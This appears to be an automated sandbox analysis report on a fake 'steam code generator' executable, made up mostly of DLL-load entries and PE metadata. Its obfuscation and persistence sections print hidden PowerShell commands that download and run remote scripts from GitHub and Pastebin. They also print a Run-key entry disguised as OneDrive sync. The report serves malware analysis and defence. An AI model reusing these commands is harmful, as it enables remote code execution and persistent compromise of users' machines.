Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: BeginSync.lnk.6.dr | LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: steamcodegenerator.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: steamcodegenerator.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: steamcodegenerator.exe | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD34783483 push edi; iretd 6_2_00007FFD34783486
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD34783858 push E8FFFFFFh; iretd 6_2_00007FFD3478385D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD348460F4 push eax; ret 6_2_00007FFD3484613D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD34846DC3 push edi; iretd 13_2_00007FFD34846DC6

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = 